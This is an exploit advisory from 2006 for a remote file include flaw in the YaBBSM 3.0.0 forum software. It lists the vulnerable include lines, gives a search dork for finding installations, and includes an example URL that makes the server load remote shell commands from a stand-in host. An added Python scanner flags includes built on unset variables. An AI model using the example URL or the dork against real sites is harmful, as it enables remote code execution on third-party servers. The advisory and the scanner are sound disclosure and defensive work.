# Title : YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability
# Published : 2006-10-13
# Author : SilenZ
[DESCRIPTION] Remote file include vuln found by sZ [oct 09, 2006]
[SOFTWARE] Supermod 3.0 for yabb
[VENDOR URL] http://www.supermod.org
[DORK] YaBBSM V2.5.0 // Powered by YaBBSM V2.5.0 Based on YABB SE
[NOTES] greetz to: neo-vortex, sk0tie, icez, Solano College CIS students.
VULN:
Offline.php
include("$sourcedir/pclzip.lib.php");
They forgot to include settings.php; this file sometimes seems not to exist.
VULN:
Sources/Admin.php
include_once("$sourcedir/Recent.php");
VULN:
Sources/Offline.php
include_once("$sourcedir/Recent.php");
VULN:
content/portalshow.php
include_once "$sourcedir/Calendar.php";
[EXAMPLE] http://site.com/community/Offline.php?sourcedir=http://shellurl.com/phpcommands.txt?
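An added example (not from the advisory or the YaBBSM code base): a heuristic Python audit that flags include/require statements whose path uses a variable the file has not assigned and that are not preceded by a settings.php include, which is the pattern in the files listed above. The sample PHP strings are constructed, and treating settings.php as the place where $sourcedir gets defined is an assumption drawn from the advisory's note.

```python
import re

# Heuristic patterns: include/require statements, PHP variables, plain assignments.
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\b([^;]*);', re.I)
VAR_RE = re.compile(r'\$([A-Za-z_]\w*)')
ASSIGN_RE = re.compile(r'\$([A-Za-z_]\w*)\s*=(?![=>])')

def find_unset_include_vars(php_source, settings_file="settings.php"):
    """Return (line_no, variable, statement) for every include whose path uses
    a variable that has not been assigned earlier in the same file and that is
    not preceded by a literal include of settings_file (assumed to define it)."""
    assigned = set()
    settings_loaded = False
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        if line.lstrip().startswith(("//", "#", "*")):
            continue  # skip comment lines
        for m in INCLUDE_RE.finditer(line):
            path_expr = m.group(1)
            variables = VAR_RE.findall(path_expr)
            # A literal (variable-free) include of the settings file counts as
            # initialising the path variables.
            if not variables and settings_file.lower() in path_expr.lower():
                settings_loaded = True
            for var in variables:
                if var not in assigned and not settings_loaded:
                    findings.append((line_no, "$" + var, m.group(0).strip()))
        assigned.update(ASSIGN_RE.findall(line))
    return findings

# Constructed samples: the include lines quoted in the advisory, then two
# corrected variants (hypothetical fixes, not the vendor's patch).
VULNERABLE = '''<?php
include("$sourcedir/pclzip.lib.php");
include_once("$sourcedir/Recent.php");
'''
FIXED = '''<?php
$sourcedir = dirname(__FILE__) . "/Sources";
include("$sourcedir/pclzip.lib.php");
'''
WITH_SETTINGS = '''<?php
require_once("Settings.php");
include_once "$sourcedir/Calendar.php";
'''

if __name__ == "__main__":
    for line_no, var, stmt in find_unset_include_vars(VULNERABLE):
        print(f"line {line_no}: {var} is not set before: {stmt}")
```

A hit means the variable's value must come from somewhere outside the file, so each one needs a manual check that the entry point cannot be requested directly with the variable unset.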
# www.Syue.com [2006-10-13]